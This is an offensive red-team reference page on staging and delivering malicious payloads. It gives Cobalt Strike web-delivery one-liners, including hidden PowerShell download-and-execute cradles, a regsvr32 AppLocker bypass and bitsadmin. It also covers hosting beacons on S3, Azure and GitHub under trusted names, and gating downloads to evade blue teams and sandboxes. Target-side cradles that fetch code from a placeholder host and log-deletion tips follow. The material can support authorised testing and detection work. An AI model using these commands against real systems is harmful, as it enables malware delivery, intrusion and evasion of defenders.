aex.red

c. Payload Staging Infrastructure

Payload Staging Infrastructure

Hosting and delivering payloads to targets. Covers web delivery, cloud hosting, and payload gating to prevent blue team retrieval.

CS: Scripted Web Delivery

Host a payload on the team server and generate a one-liner for the target to download and execute.

# Attacks > Scripted Web Delivery
# Type: bitsadmin, exe, powershell, python, regsvr32
 
# PowerShell one-liner (generated by CS)
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://<teamserver>/a'))"
 
# Regsvr32 (AppLocker bypass — Microsoft-signed binary)
regsvr32 /s /n /u /i:http://<teamserver>/a scrobj.dll
 
# bitsadmin (downloads to disk)
bitsadmin /transfer update /download /priority high http://<teamserver>/payload.exe C:\Users\Public\update.exe & C:\Users\Public\update.exe

Warning

CS web delivery binds on the team server IP. If the team server is not directly accessible, use a redirector (see a. Infrastructure Hardening).

Simple Web Servers

Quick payload hosting on the attacker machine.

# Python
python3 -m http.server 80
python3 -m http.server 8080 --directory /path/to/payloads
 
# PHP
php -S 0.0.0.0:80
 
# Ruby
ruby -run -e httpd . -p 80
 
# Nginx (more resilient for real ops)
# /etc/nginx/sites-enabled/payload.conf
server {
    listen 80;
    server_name cdn.example.com;
    root /var/www/payloads;
    autoindex off;
}

Cloud-Based Hosting

S3 Bucket

# Create bucket and upload payload
aws s3 mb s3://legit-update-cdn
aws s3 cp beacon.exe s3://legit-update-cdn/update.exe --acl public-read
 
# Generate presigned URL (time-limited access)
aws s3 presign s3://legit-update-cdn/update.exe --expires-in 3600
 
# Download on target
certutil -urlcache -split -f "https://legit-update-cdn.s3.amazonaws.com/update.exe" C:\Users\Public\update.exe

Azure Blob Storage

# Create storage account and container
az storage account create -n legitcdnstorage -g rg-ops --sku Standard_LRS
az storage container create -n payloads --account-name legitcdnstorage --public-access blob
 
# Upload
az storage blob upload --account-name legitcdnstorage -c payloads -n update.exe -f beacon.exe
 
# URL: https://legitcdnstorage.blob.core.windows.net/payloads/update.exe

GitHub Releases / Gists

# Private gist for script-based payloads
gh gist create --public payload.ps1
 
# GitHub release for binary payloads
gh release create v1.0 beacon.exe --repo user/legit-repo --notes "update"

Cloud-hosted payloads benefit from trusted domains — *.s3.amazonaws.com, *.blob.core.windows.net, github.com are often allowlisted.

Payload Gating

Restrict who can download your payload to prevent blue team retrieval and sandbox analysis.

User-Agent Filtering (Apache)

# /etc/apache2/sites-enabled/payload.conf
<VirtualHost *:80>
    ServerName cdn.example.com
    DocumentRoot /var/www/payloads
 
    # Only serve to specific User-Agents
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} !.*MSIE.*|.*Trident.*|.*Edge.*|.*Chrome.* [NC]
    RewriteRule .* - [F,L]
</VirtualHost>

Geofencing (IP-Based)

# Only serve to target country/ASN IP ranges
<Directory /var/www/payloads>
    Require ip 203.0.113.0/24
    Require ip 198.51.100.0/24
</Directory>
# iptables — restrict to specific source IPs
iptables -A INPUT -p tcp --dport 80 -s <target_range> -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

Time-Based Gating

# Only serve during business hours (target timezone)
RewriteEngine On
RewriteCond %{TIME_HOUR} <08 [OR]
RewriteCond %{TIME_HOUR} >18
RewriteRule .* - [F,L]

One-Time Download (mod_rewrite + Flag File)

# Serve payload once, then 404
RewriteEngine On
RewriteCond /var/www/flags/%{REMOTE_ADDR}.flag -f
RewriteRule .* - [F,L]
 
# Script to create flag after first download (via CGI or log monitoring)

Payload Hosting Checklist

  • Payload not directly on team server (use redirector)
  • HTTPS with valid certificate
  • User-Agent filtering to block scanners/sandboxes
  • Geofencing if target IP ranges are known
  • Payloads named to look legitimate (update.exe, setup.msi, config.dll)
  • Remove payloads after delivery window closes
  • Server headers stripped or spoofed (no Python/SimpleHTTPServer)
  • No directory listing enabled

Download One-Liners (Target-Side)

Quick reference for downloading hosted payloads on the target. See also: Download One-Liners.

# PowerShell — in-memory
IEX (New-Object Net.WebClient).DownloadString('http://<host>/payload.ps1')
IEX (iwr http://<host>/payload.ps1 -UseBasicParsing)
 
# PowerShell — to disk
(New-Object Net.WebClient).DownloadFile('http://<host>/beacon.exe','C:\Users\Public\update.exe')
iwr http://<host>/beacon.exe -OutFile C:\Users\Public\update.exe
 
# certutil
certutil -urlcache -split -f http://<host>/beacon.exe C:\Users\Public\update.exe
certutil -urlcache -split -f http://<host>/beacon.exe C:\Users\Public\update.exe & del /f certutil.log
 
# bitsadmin
bitsadmin /transfer job /download /priority high http://<host>/beacon.exe C:\Users\Public\update.exe
 
# curl (Win10+)
curl http://<host>/beacon.exe -o C:\Users\Public\update.exe

Note

OPSEC:

  • certutil download is logged as Event 4688 with suspicious command-line arguments — commonly detected
  • PowerShell DownloadString triggers script block logging
  • bitsadmin creates a persistent job — clean up with bitsadmin /cancel job
  • Cloud storage URLs may be logged by corporate proxy — presigned URLs with short TTL reduce exposure

Graph View